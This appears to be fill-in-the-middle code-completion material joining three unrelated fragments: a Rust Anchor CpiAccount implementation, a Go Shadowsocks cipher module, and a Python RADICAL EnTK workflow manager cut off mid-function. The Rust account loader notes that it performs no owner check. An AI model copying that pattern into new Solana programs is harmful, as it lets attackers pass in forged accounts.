fn try_accounts(
_program_id: &Pubkey,
accounts: &mut &[AccountInfo<'info>],
_ix_data: &[u8],
) -> Result<Self, ProgramError> {
if accounts.is_empty() {
return Err(ErrorCode::AccountNotEnoughKeys.into());
}
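        // Take the first account info and advance the slice so that subsequent
        // fields deserialize from the remaining accounts.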
let account = &accounts[0];
*accounts = &accounts[1..];
// No owner check is done here.
let pa = CpiAccount::try_from(account)?;
Ok(pa)
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> ToAccountMetas for CpiAccount<'info, T> {
fn to_account_metas(&self, is_signer: Option<bool>) -> Vec<AccountMeta> {
let is_signer = is_signer.unwrap_or(self.info.is_signer);
let meta = match self.info.is_writable {
false => AccountMeta::new_readonly(*self.info.key, is_signer),
true => AccountMeta::new(*self.info.key, is_signer),
};
vec![meta]
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> ToAccountInfos<'info> for CpiAccount<'info, T> {
fn to_account_infos(&self) -> Vec<AccountInfo<'info>> {
vec![self.info.clone()]
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> ToAccountInfo<'info> for CpiAccount<'info, T> {
fn to_account_info(&self) -> AccountInfo<'info> {
self.info.clone()
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> AsRef<AccountInfo<'info>> for CpiAccount<'info, T> {
fn as_ref(&self) -> &AccountInfo<'info> {
&self.info
}
}
#[allow(deprecated)]
impl<'a, T: AccountDeserialize + Clone> Deref for CpiAccount<'a, T> {
type Target = T;
fn deref(&self) -> &Self::Target {
&self.account
}
}
#[allow(deprecated)]
impl<'a, T: AccountDeserialize + Clone> DerefMut for CpiAccount<'a, T> {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.account
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> AccountsExit<'info> for CpiAccount<'info, T> {
fn exit(&self, _program_id: &Pubkey) -> ProgramResult {
// no-op
Ok(())
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> Key for CpiAccount<'info, T> {
fn key(&self) -> Pubkey {
*self.info.key
}
}
#[allow(deprecated)]
impl<'info, T> From<Account<'info, T>> for CpiAccount<'info, T>
where
T: AccountSerialize + AccountDeserialize + Owner + Clone,
{
fn from(a: Account<'info, T>) -> Self {
Self::new(a.to_account_info(), Box::new(a.into_inner()))
}
}
|
impl<'info, T> Accounts<'info> for CpiAccount<'info, T>
|
config.go
|
package shadowsocks
import (
"bytes"
"crypto/aes"
"crypto/cipher"
"crypto/md5"
"crypto/sha1"
"io"
"golang.org/x/crypto/chacha20poly1305"
"golang.org/x/crypto/hkdf"
"github.com/perfect-network/v2ray-core/common"
"github.com/perfect-network/v2ray-core/common/buf"
"github.com/perfect-network/v2ray-core/common/crypto"
"github.com/perfect-network/v2ray-core/common/protocol"
)
// MemoryAccount is an account type converted from Account.
type MemoryAccount struct {
Cipher Cipher
Key []byte
}
// Equals implements protocol.Account.Equals().
func (a *MemoryAccount) Equals(another protocol.Account) bool {
if account, ok := another.(*MemoryAccount); ok {
return bytes.Equal(a.Key, account.Key)
}
return false
}
func
|
(key []byte) cipher.AEAD {
block, err := aes.NewCipher(key)
common.Must(err)
gcm, err := cipher.NewGCM(block)
common.Must(err)
return gcm
}
func createChacha20Poly1305(key []byte) cipher.AEAD {
chacha20, err := chacha20poly1305.New(key)
common.Must(err)
return chacha20
}
func (a *Account) getCipher() (Cipher, error) {
switch a.CipherType {
case CipherType_AES_128_CFB:
return &AesCfb{KeyBytes: 16}, nil
case CipherType_AES_256_CFB:
return &AesCfb{KeyBytes: 32}, nil
case CipherType_CHACHA20:
return &ChaCha20{IVBytes: 8}, nil
case CipherType_CHACHA20_IETF:
return &ChaCha20{IVBytes: 12}, nil
case CipherType_AES_128_GCM:
return &AEADCipher{
KeyBytes: 16,
IVBytes: 16,
AEADAuthCreator: createAesGcm,
}, nil
case CipherType_AES_256_GCM:
return &AEADCipher{
KeyBytes: 32,
IVBytes: 32,
AEADAuthCreator: createAesGcm,
}, nil
case CipherType_CHACHA20_POLY1305:
return &AEADCipher{
KeyBytes: 32,
IVBytes: 32,
AEADAuthCreator: createChacha20Poly1305,
}, nil
case CipherType_NONE:
return NoneCipher{}, nil
default:
return nil, newError("Unsupported cipher.")
}
}
// AsAccount implements protocol.AsAccount.
func (a *Account) AsAccount() (protocol.Account, error) {
cipher, err := a.getCipher()
if err != nil {
return nil, newError("failed to get cipher").Base(err)
}
return &MemoryAccount{
Cipher: cipher,
Key: passwordToCipherKey([]byte(a.Password), cipher.KeySize()),
}, nil
}
// Cipher is an interface for all Shadowsocks ciphers.
type Cipher interface {
KeySize() int32
IVSize() int32
NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error)
NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error)
IsAEAD() bool
EncodePacket(key []byte, b *buf.Buffer) error
DecodePacket(key []byte, b *buf.Buffer) error
}
// AesCfb represents all AES-CFB ciphers.
type AesCfb struct {
KeyBytes int32
}
func (*AesCfb) IsAEAD() bool {
return false
}
func (v *AesCfb) KeySize() int32 {
return v.KeyBytes
}
func (v *AesCfb) IVSize() int32 {
return 16
}
func (v *AesCfb) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
stream := crypto.NewAesEncryptionStream(key, iv)
return &buf.SequentialWriter{Writer: crypto.NewCryptionWriter(stream, writer)}, nil
}
func (v *AesCfb) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
stream := crypto.NewAesDecryptionStream(key, iv)
return &buf.SingleReader{
Reader: crypto.NewCryptionReader(stream, reader),
}, nil
}
func (v *AesCfb) EncodePacket(key []byte, b *buf.Buffer) error {
iv := b.BytesTo(v.IVSize())
stream := crypto.NewAesEncryptionStream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
return nil
}
func (v *AesCfb) DecodePacket(key []byte, b *buf.Buffer) error {
if b.Len() <= v.IVSize() {
return newError("insufficient data: ", b.Len())
}
iv := b.BytesTo(v.IVSize())
stream := crypto.NewAesDecryptionStream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
b.Advance(v.IVSize())
return nil
}
type AEADCipher struct {
KeyBytes int32
IVBytes int32
AEADAuthCreator func(key []byte) cipher.AEAD
}
func (*AEADCipher) IsAEAD() bool {
return true
}
func (c *AEADCipher) KeySize() int32 {
return c.KeyBytes
}
func (c *AEADCipher) IVSize() int32 {
return c.IVBytes
}
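// createAuthenticator derives a per-session subkey from the master key and the
// connection salt (IV) via HKDF-SHA1 and pairs the AEAD with a fresh nonce
// generator, as required by the Shadowsocks AEAD construction.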
func (c *AEADCipher) createAuthenticator(key []byte, iv []byte) *crypto.AEADAuthenticator {
nonce := crypto.GenerateInitialAEADNonce()
subkey := make([]byte, c.KeyBytes)
hkdfSHA1(key, iv, subkey)
return &crypto.AEADAuthenticator{
AEAD: c.AEADAuthCreator(subkey),
NonceGenerator: nonce,
}
}
func (c *AEADCipher) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
auth := c.createAuthenticator(key, iv)
return crypto.NewAuthenticationWriter(auth, &crypto.AEADChunkSizeParser{
Auth: auth,
}, writer, protocol.TransferTypeStream, nil), nil
}
func (c *AEADCipher) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
auth := c.createAuthenticator(key, iv)
return crypto.NewAuthenticationReader(auth, &crypto.AEADChunkSizeParser{
Auth: auth,
}, reader, protocol.TransferTypeStream, nil), nil
}
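// EncodePacket seals a UDP packet in place: the buffer holds [salt | payload],
// the salt feeds the subkey derivation, and the AEAD tag is appended at the end.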
func (c *AEADCipher) EncodePacket(key []byte, b *buf.Buffer) error {
ivLen := c.IVSize()
payloadLen := b.Len()
auth := c.createAuthenticator(key, b.BytesTo(ivLen))
b.Extend(int32(auth.Overhead()))
_, err := auth.Seal(b.BytesTo(ivLen), b.BytesRange(ivLen, payloadLen))
return err
}
func (c *AEADCipher) DecodePacket(key []byte, b *buf.Buffer) error {
if b.Len() <= c.IVSize() {
return newError("insufficient data: ", b.Len())
}
ivLen := c.IVSize()
payloadLen := b.Len()
auth := c.createAuthenticator(key, b.BytesTo(ivLen))
bbb, err := auth.Open(b.BytesTo(ivLen), b.BytesRange(ivLen, payloadLen))
if err != nil {
return err
}
b.Resize(ivLen, int32(len(bbb)))
return nil
}
type ChaCha20 struct {
IVBytes int32
}
func (*ChaCha20) IsAEAD() bool {
return false
}
func (v *ChaCha20) KeySize() int32 {
return 32
}
func (v *ChaCha20) IVSize() int32 {
return v.IVBytes
}
func (v *ChaCha20) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
stream := crypto.NewChaCha20Stream(key, iv)
return &buf.SequentialWriter{Writer: crypto.NewCryptionWriter(stream, writer)}, nil
}
func (v *ChaCha20) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
stream := crypto.NewChaCha20Stream(key, iv)
return &buf.SingleReader{Reader: crypto.NewCryptionReader(stream, reader)}, nil
}
func (v *ChaCha20) EncodePacket(key []byte, b *buf.Buffer) error {
iv := b.BytesTo(v.IVSize())
stream := crypto.NewChaCha20Stream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
return nil
}
func (v *ChaCha20) DecodePacket(key []byte, b *buf.Buffer) error {
if b.Len() <= v.IVSize() {
return newError("insufficient data: ", b.Len())
}
iv := b.BytesTo(v.IVSize())
stream := crypto.NewChaCha20Stream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
b.Advance(v.IVSize())
return nil
}
type NoneCipher struct{}
func (NoneCipher) KeySize() int32 { return 0 }
func (NoneCipher) IVSize() int32 { return 0 }
func (NoneCipher) IsAEAD() bool {
return true // to avoid OTA
}
func (NoneCipher) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
return buf.NewReader(reader), nil
}
func (NoneCipher) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
return buf.NewWriter(writer), nil
}
func (NoneCipher) EncodePacket(key []byte, b *buf.Buffer) error {
return nil
}
func (NoneCipher) DecodePacket(key []byte, b *buf.Buffer) error {
return nil
}
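// passwordToCipherKey stretches the user password into a master key of the
// required size by chaining MD5 digests (the EVP_BytesToKey construction
// traditionally used by Shadowsocks).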
func passwordToCipherKey(password []byte, keySize int32) []byte {
key := make([]byte, 0, keySize)
md5Sum := md5.Sum(password)
key = append(key, md5Sum[:]...)
for int32(len(key)) < keySize {
md5Hash := md5.New()
common.Must2(md5Hash.Write(md5Sum[:]))
common.Must2(md5Hash.Write(password))
md5Hash.Sum(md5Sum[:0])
key = append(key, md5Sum[:]...)
}
return key
}
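// hkdfSHA1 expands the master key and per-connection salt into a session
// subkey using HKDF-SHA1 with the fixed info string "ss-subkey".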
func hkdfSHA1(secret, salt, outkey []byte) {
r := hkdf.New(sha1.New, secret, salt, []byte("ss-subkey"))
common.Must2(io.ReadFull(r, outkey))
}
|
createAesGcm
|
appmanager.py
|
__copyright__ = "Copyright 2017-2018, http://radical.rutgers.edu"
__author__ = "Vivek Balasubramanian <[email protected]>"
__license__ = "MIT"
import radical.utils as ru
from radical.entk.exceptions import *
from radical.entk.pipeline.pipeline import Pipeline
from radical.entk.stage.stage import Stage
from radical.entk.task.task import Task
from radical.entk.utils.prof_utils import write_session_description
from radical.entk.utils.prof_utils import write_workflow
from wfprocessor import WFprocessor
import sys
import time
import os
import Queue
import pika
import json
from threading import Thread, Event
from radical.entk import states
class AppManager(object):
"""
    An application manager is responsible for setting up the communication infrastructure; it instantiates the
    ResourceManager, TaskManager and WFProcessor objects along with all their threads and processes. This is the
    master object running in the main process and is designed to recover from errors in all other objects, threads
    and processes.
:Arguments:
        :config_path: path to the config file to be read for the AppManager
        :hostname: host on which the RabbitMQ server is running
        :port: port at which RabbitMQ can be accessed
:reattempts: number of attempts to re-invoke any failed EnTK components
:resubmit_failed: resubmit failed tasks (True/False)
:autoterminate: terminate resource reservation upon execution of all tasks of first workflow (True/False)
:write_workflow: write workflow and mapping to rts entities to a file (post-termination)
:rts: Specify RTS to use. Current options: 'mock', 'radical.pilot' (default if unspecified)
:rmq_cleanup: Cleanup all queues created in RabbitMQ server for current execution (default is True)
:rts_config: Configuration for the RTS, accepts {"sandbox_cleanup": True/False,"db_cleanup": True/False} when RTS is RP
:name: Name of the Application. It should be unique between executions. (default is randomly assigned)
"""
def __init__(self,
config_path=None,
hostname=None,
port=None,
reattempts=None,
resubmit_failed=None,
autoterminate=None,
write_workflow=None,
rts=None,
rmq_cleanup=None,
rts_config=None,
name=None):
# Create a session for each EnTK script execution
if name:
self._name = name
self._sid = name
else:
            self._name = str()
self._sid = ru.generate_id('re.session', ru.ID_PRIVATE)
self._read_config(config_path, hostname, port, reattempts,
resubmit_failed, autoterminate, write_workflow,
rts, rmq_cleanup, rts_config)
# Create an uid + logger + profiles for AppManager, under the sid
# namespace
path = os.getcwd() + '/' + self._sid
self._uid = ru.generate_id('appmanager.%(item_counter)04d', ru.ID_CUSTOM, namespace=self._sid)
self._logger = ru.Logger('radical.entk.%s' % self._uid, path=path, targets=['2','.'])
self._prof = ru.Profiler(name='radical.entk.%s' % self._uid, path=path)
self._report = ru.Reporter(name='radical.entk.%s' % self._uid)
self._report.info('EnTK session: %s\n' % self._sid)
self._prof.prof('create amgr obj', uid=self._uid)
self._report.info('Creating AppManager')
self._resource_manager = None
# RabbitMQ Queues
self._pending_queue = list()
self._completed_queue = list()
# Global parameters to have default values
self._mqs_setup = False
self._resource_desc = None
self._task_manager = None
self._workflow = None
self._cur_attempt = 1
self._shared_data = list()
        self._rmq_ping_interval = int(os.getenv('RMQ_PING_INTERVAL', 10))
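        # RMQ_PING_INTERVAL is interpreted as seconds; the synchronizer calls
        # process_data_events() at least this often to keep the connection alive.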
self._logger.info('Application Manager initialized')
self._prof.prof('amgr obj created', uid=self._uid)
self._report.ok('>>ok\n')
def _read_config(self, config_path, hostname, port, reattempts,
resubmit_failed, autoterminate, write_workflow,
rts, rmq_cleanup, rts_config):
if not config_path:
config_path = os.path.dirname(os.path.abspath(__file__))
config = ru.read_json(os.path.join(config_path, 'config.json'))
self._mq_hostname = hostname if hostname else str(config['hostname'])
self._port = port if port else config['port']
self._reattempts = reattempts if reattempts else config['reattempts']
self._resubmit_failed = resubmit_failed if resubmit_failed is not None else config['resubmit_failed']
self._autoterminate = autoterminate if autoterminate is not None else config['autoterminate']
self._write_workflow = write_workflow if write_workflow is not None else config['write_workflow']
self._rts = rts if rts in ['radical.pilot', 'mock'] else str(config['rts'])
self._rmq_cleanup = rmq_cleanup if rmq_cleanup is not None else config['rmq_cleanup']
self._rts_config = rts_config if rts_config is not None else config['rts_config']
self._num_pending_qs = config['pending_qs']
self._num_completed_qs = config['completed_qs']
# ------------------------------------------------------------------------------------------------------------------
# Getter functions
# ------------------------------------------------------------------------------------------------------------------
@property
def name(self):
"""
        Name of the application manager. Allows the user to set the name of
        the application manager as well as its session ID. This name should be
        unique between different EnTK executions; otherwise it will produce an
        error.
:getter: Returns the name of the application manager
:setter: Assigns the name of the application manager
:type: String
"""
return self._name
@property
def sid(self):
"""
Get the session ID of the current EnTK execution
:getter: Returns the session ID of the EnTK execution
:type: String
"""
return self._sid
@property
def resource_desc(self):
"""
:getter: Returns the resource description
:setter: Assigns a resource description
"""
return self._resource_desc
@property
def workflow(self):
"""
:getter: Return the workflow assigned for execution
:setter: Assign workflow to be executed
"""
return self._workflow
@property
def shared_data(self):
"""
:getter: Return list of filenames that are shared between multiple tasks of the application
:setter: Assign a list of names of files that need to be staged to the remote machine
"""
return self._shared_data
# ------------------------------------------------------------------------------------------------------------------
# Setter functions
# ------------------------------------------------------------------------------------------------------------------
@name.setter
def name(self, value):
if not isinstance(value, str):
raise TypeError(expected_type=str, actual_type=type(value))
else:
self._name = value
@resource_desc.setter
def resource_desc(self, value):
if self._rts == 'radical.pilot':
from radical.entk.execman.rp import ResourceManager
self._resource_manager = ResourceManager(resource_desc=value,
sid=self._sid,
rts_config=self._rts_config)
elif self._rts == 'mock':
from radical.entk.execman.mock import ResourceManager
self._resource_manager = ResourceManager(resource_desc=value,
sid=self._sid)
self._report.info('Validating and assigning resource manager')
if self._resource_manager._validate_resource_desc():
self._resource_manager._populate()
self._resource_manager.shared_data = self._shared_data
else:
self._logger.error('Could not validate resource description')
            raise EnTKError(text='Could not validate resource description')
self._report.ok('>>ok\n')
@workflow.setter
def workflow(self, workflow):
|
@shared_data.setter
def shared_data(self, data):
if not isinstance(data, list):
data = [data]
for val in data:
if not isinstance(val, str):
raise TypeError(expected_type=str, actual_type=type(val))
if self._resource_manager:
self._resource_manager.shared_data = data
# ------------------------------------------------------------------------------------------------------------------
# Public methods
# ------------------------------------------------------------------------------------------------------------------
def run(self):
"""
        **Purpose**: Run the application manager. Once the workflow and resource manager have been assigned, invoking
        this method sets up the communication infrastructure, submits a resource request and then submits all the
        tasks for execution.
"""
try:
# Set None objects local to each run
self._wfp = None
self._sync_thread = None
self._terminate_sync = Event()
self._resubmit_failed = False
self._cur_attempt = 1
if not self._workflow:
self._logger.error('No workflow assigned currently, please check your script')
raise MissingError(obj=self._uid, missing_attribute='workflow')
if not self._resource_manager:
self._logger.error(
'No resource manager assigned currently, please create and add a valid resource manager')
raise MissingError(obj=self._uid, missing_attribute='resource_manager')
self._prof.prof('amgr run started', uid=self._uid)
# Setup rabbitmq stuff
if not self._mqs_setup:
self._report.info('Setting up RabbitMQ system')
setup = self._setup_mqs()
if not setup:
self._logger.error('RabbitMQ system not available')
raise EnTKError(text="RabbitMQ setup failed")
self._mqs_setup = True
self._report.ok('>>ok\n')
# Create WFProcessor object
self._prof.prof('creating wfp obj', uid=self._uid)
self._wfp = WFprocessor(sid=self._sid,
workflow=self._workflow,
pending_queue=self._pending_queue,
completed_queue=self._completed_queue,
mq_hostname=self._mq_hostname,
port=self._port,
resubmit_failed=self._resubmit_failed)
self._wfp._initialize_workflow()
self._workflow = self._wfp.workflow
# Submit resource request if not resource allocation done till now or
# resubmit a new one if the old one has completed
if self._resource_manager:
res_alloc_state = self._resource_manager.get_resource_allocation_state()
if (not res_alloc_state) or (res_alloc_state in self._resource_manager.get_completed_states()):
self._logger.info('Starting resource request submission')
self._prof.prof('init rreq submission', uid=self._uid)
self._resource_manager._submit_resource_request()
else:
self._logger.error(
'Cannot run without resource manager, please create and assign a resource manager')
raise EnTKError(text='Missing resource manager')
# Start synchronizer thread
if not self._sync_thread:
self._logger.info('Starting synchronizer thread')
self._sync_thread = Thread(target=self._synchronizer, name='synchronizer-thread')
self._prof.prof('starting synchronizer thread', uid=self._uid)
self._sync_thread.start()
# Start WFprocessor
self._logger.info('Starting WFProcessor process from AppManager')
self._wfp.start_processor()
self._report.ok('All components created\n')
# Create tmgr object only if it does not already exist
if self._rts == 'radical.pilot':
from radical.entk.execman.rp import TaskManager
elif self._rts == 'mock':
from radical.entk.execman.mock import TaskManager
if not self._task_manager:
self._prof.prof('creating tmgr obj', uid=self._uid)
self._task_manager = TaskManager(sid=self._sid,
pending_queue=self._pending_queue,
completed_queue=self._completed_queue,
mq_hostname=self._mq_hostname,
rmgr=self._resource_manager,
port=self._port
)
self._logger.info('Starting task manager process from AppManager')
self._task_manager.start_manager()
self._task_manager.start_heartbeat()
active_pipe_count = len(self._workflow)
finished_pipe_uids = []
# We wait till all pipelines of the workflow are marked
# complete
while ((active_pipe_count > 0) and
(self._wfp.workflow_incomplete()) and
(self._resource_manager.get_resource_allocation_state() not
in self._resource_manager.get_completed_states())):
if active_pipe_count > 0:
for pipe in self._workflow:
with pipe.lock:
if (pipe.completed) and (pipe.uid not in finished_pipe_uids):
self._logger.info('Pipe %s completed' % pipe.uid)
finished_pipe_uids.append(pipe.uid)
active_pipe_count -= 1
self._logger.info('Active pipes: %s' % active_pipe_count)
if (not self._sync_thread.is_alive()) and (self._cur_attempt <= self._reattempts):
self._sync_thread = Thread(target=self._synchronizer,
name='synchronizer-thread')
self._logger.info('Restarting synchronizer thread')
self._prof.prof('restarting synchronizer', uid=self._uid)
self._sync_thread.start()
self._cur_attempt += 1
if (not self._wfp.check_processor()) and (self._cur_attempt <= self._reattempts):
"""
If WFP dies, both child threads are also cleaned out.
We simply recreate the wfp object with a copy of the workflow
in the appmanager and start the processor.
"""
self._prof.prof('recreating wfp obj', uid=self._uid)
                    self._wfp = WFprocessor(
sid=self._sid,
workflow=self._workflow,
pending_queue=self._pending_queue,
completed_queue=self._completed_queue,
mq_hostname=self._mq_hostname,
port=self._port,
resubmit_failed=self._resubmit_failed)
self._logger.info('Restarting WFProcessor process from AppManager')
self._wfp.start_processor()
self._cur_attempt += 1
if (not self._task_manager.check_heartbeat()) and (self._cur_attempt <= self._reattempts):
"""
If the tmgr process or heartbeat dies, we simply start a
new process using the start_manager method. We do not
need to create a new instance of the TaskManager object
itself. We stop and start a new instance of the
heartbeat thread as well.
"""
self._prof.prof('restarting tmgr process and heartbeat', uid=self._uid)
self._logger.info('Terminating heartbeat thread')
self._task_manager.terminate_heartbeat()
self._logger.info('Terminating tmgr process')
self._task_manager.terminate_manager()
self._logger.info('Restarting task manager process')
self._task_manager.start_manager()
self._logger.info('Restarting heartbeat thread')
self._task_manager.start_heartbeat()
self._cur_attempt += 1
self._prof.prof('start termination', uid=self._uid)
# Terminate threads in following order: wfp, helper, synchronizer
self._logger.info('Terminating WFprocessor')
self._wfp.terminate_processor()
self._logger.info('Terminating synchronizer thread')
self._terminate_sync.set()
self._sync_thread.join()
self._logger.info('Synchronizer thread terminated')
if self._autoterminate:
self.resource_terminate()
if self._write_workflow:
write_workflow(self._workflow, self._sid)
self._prof.prof('termination done', uid=self._uid)
except KeyboardInterrupt:
self._prof.prof('start termination', uid=self._uid)
self._logger.error('Execution interrupted by user (you probably hit Ctrl+C), ' +
'trying to cancel enqueuer thread gracefully...')
# Terminate threads in following order: wfp, helper, synchronizer
if self._wfp:
self._logger.info('Terminating WFprocessor')
self._wfp.terminate_processor()
if self._task_manager:
self._logger.info('Terminating task manager process')
self._task_manager.terminate_manager()
self._task_manager.terminate_heartbeat()
if self._sync_thread:
self._logger.info('Terminating synchronizer thread')
self._terminate_sync.set()
self._sync_thread.join()
self._logger.info('Synchronizer thread terminated')
if self._resource_manager:
self._resource_manager._terminate_resource_request()
self._prof.prof('termination done', uid=self._uid)
raise KeyboardInterrupt
        except Exception as ex:
self._prof.prof('start termination', uid=self._uid)
self._logger.exception('Error in AppManager: %s' % ex)
# Terminate threads in following order: wfp, helper, synchronizer
if self._wfp:
self._logger.info('Terminating WFprocessor')
self._wfp.terminate_processor()
if self._task_manager:
self._logger.info('Terminating task manager process')
self._task_manager.terminate_manager()
self._task_manager.terminate_heartbeat()
if self._sync_thread:
self._logger.info('Terminating synchronizer thread')
self._terminate_sync.set()
self._sync_thread.join()
self._logger.info('Synchronizer thread terminated')
if self._resource_manager:
self._resource_manager._terminate_resource_request()
self._prof.prof('termination done', uid=self._uid)
raise
def resource_terminate(self):
if self._task_manager:
self._logger.info('Terminating task manager process')
self._task_manager.terminate_manager()
self._task_manager.terminate_heartbeat()
if self._resource_manager:
self._resource_manager._terminate_resource_request()
if os.environ.get('RADICAL_ENTK_PROFILE', False):
write_session_description(self)
if self._rmq_cleanup:
self._cleanup_mqs()
self._report.info('All components terminated\n')
# ------------------------------------------------------------------------------------------------------------------
# Private methods
# ------------------------------------------------------------------------------------------------------------------
def _setup_mqs(self):
"""
        **Purpose**: Set up the RabbitMQ system on the client side. We instantiate queue(s) 'pendingq-*' for
        communication between the enqueuer thread and the task manager process, and queue(s) 'completedq-*' for
        communication between the task manager and the dequeuer thread. The '*-to-sync' queues carry messages from
        the enqueuer/dequeuer/callback/task_manager to the synchronizer thread, and the 'sync-to-*' queues carry
        the corresponding acknowledgements back.
        Details: after an erroneous run, queues might still hold unacknowledged messages from that run. Hence all
        queues are namespaced by the session id, and _cleanup_mqs() deletes them once the run terminates.
"""
try:
self._prof.prof('init mqs setup', uid=self._uid)
self._logger.debug('Setting up mq connection and channel')
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=self._mq_hostname, port=self._port))
mq_channel = mq_connection.channel()
self._logger.debug('Connection and channel setup successful')
self._logger.debug('Setting up all exchanges and queues')
qs = [
'%s-tmgr-to-sync' % self._sid,
'%s-cb-to-sync' % self._sid,
'%s-enq-to-sync' % self._sid,
'%s-deq-to-sync' % self._sid,
'%s-sync-to-tmgr' % self._sid,
'%s-sync-to-cb' % self._sid,
'%s-sync-to-enq' % self._sid,
'%s-sync-to-deq' % self._sid
]
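            # One queue per configured pending/completed instance, all namespaced
            # by the session id so that concurrent sessions do not collide.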
for i in range(1, self._num_pending_qs + 1):
queue_name = '%s-pendingq-%s' % (self._sid, i)
self._pending_queue.append(queue_name)
qs.append(queue_name)
for i in range(1, self._num_completed_qs + 1):
queue_name = '%s-completedq-%s' % (self._sid, i)
self._completed_queue.append(queue_name)
qs.append(queue_name)
f = open('.%s.txt' % self._sid, 'w')
for q in qs:
                # Queues are declared with default (non-durable) settings and are
                # removed again by _cleanup_mqs() at the end of the run
mq_channel.queue_declare(queue=q)
f.write(q + '\n')
f.close()
self._logger.debug('All exchanges and queues are setup')
self._prof.prof('mqs setup done', uid=self._uid)
return True
        except Exception as ex:
self._logger.error('Error setting RabbitMQ system: %s' % ex)
raise
def _cleanup_mqs(self):
try:
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=self._mq_hostname, port=self._port))
mq_channel = mq_connection.channel()
mq_channel.queue_delete(queue='%s-tmgr-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-cb-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-enq-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-deq-to-sync' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-tmgr' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-cb' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-enq' % self._sid)
mq_channel.queue_delete(queue='%s-sync-to-deq' % self._sid)
for i in range(1, self._num_pending_qs + 1):
queue_name = '%s-pendingq-%s' % (self._sid, i)
mq_channel.queue_delete(queue=queue_name)
for i in range(1, self._num_completed_qs + 1):
queue_name = '%s-completedq-%s' % (self._sid, i)
mq_channel.queue_delete(queue=queue_name)
except Exception as ex:
self._logger.exception('Message queues not deleted, error: %s' % ex)
raise
def _synchronizer(self):
"""
        **Purpose**: Thread in the master process that keeps the workflow data
        structure in the appmanager up to date. We receive Pipeline, Stage and
        Task objects directly, and the respective object is updated in this
        master process.
        Details: note that acknowledgements of the type channel.basic_ack()
        tell the RabbitMQ server that the message was received. This is not to
        be confused with the ack sent back to the enqueuer/dequeuer/task_manager
        through the 'sync-to-*' queues.
"""
try:
self._prof.prof('synchronizer started', uid=self._uid)
self._logger.info('synchronizer thread started')
def task_update(msg, reply_to, corr_id, mq_channel):
completed_task = Task()
completed_task.from_dict(msg['object'])
self._logger.info('Received %s with state %s' % (completed_task.uid, completed_task.state))
found_task = False
# Traverse the entire workflow to find the correct task
for pipe in self._workflow:
if not pipe.completed:
if completed_task.parent_pipeline['uid'] == pipe.uid:
for stage in pipe.stages:
if completed_task.parent_stage['uid'] == stage.uid:
for task in stage.tasks:
                                        if (completed_task.uid == task.uid) and (completed_task.state != task.state):
task.state = str(completed_task.state)
self._logger.debug('Found task %s with state %s' %
(task.uid, task.state))
if completed_task.path:
task.path = str(completed_task.path)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % task.uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
self._report.ok('Update: ')
self._report.info('Task %s in state %s\n' % (task.uid, task.state))
found_task = True
if not found_task:
                                        # If there was a Task update but the Task was not found in any of the
                                        # Pipelines, it means the Task was added during runtime and the AppManager
                                        # does not know about it. The current solution: add it to the workflow
                                        # object in the AppManager via the synchronizer.
self._prof.prof('Adap: adding new task')
self._logger.info('Adding new task %s to parent stage: %s' % (completed_task.uid,
stage.uid))
stage.add_tasks(completed_task)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % completed_task.uid)
self._prof.prof('Adap: added new task')
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
self._report.ok('Update: ')
self._report.info('Task %s in state %s\n' %
(completed_task.uid, completed_task.state))
def stage_update(msg, reply_to, corr_id, mq_channel):
completed_stage = Stage()
completed_stage.from_dict(msg['object'])
self._logger.info('Received %s with state %s' % (completed_stage.uid, completed_stage.state))
found_stage = False
# Traverse the entire workflow to find the correct stage
for pipe in self._workflow:
if not pipe.completed:
if completed_stage.parent_pipeline['uid'] == pipe.uid:
self._logger.info('Found parent pipeline: %s' % pipe.uid)
for stage in pipe.stages:
                                if (completed_stage.uid == stage.uid) and (completed_stage.state != stage.state):
self._logger.debug('Found stage %s' % stage.uid)
stage.state = str(completed_stage.state)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % stage.uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
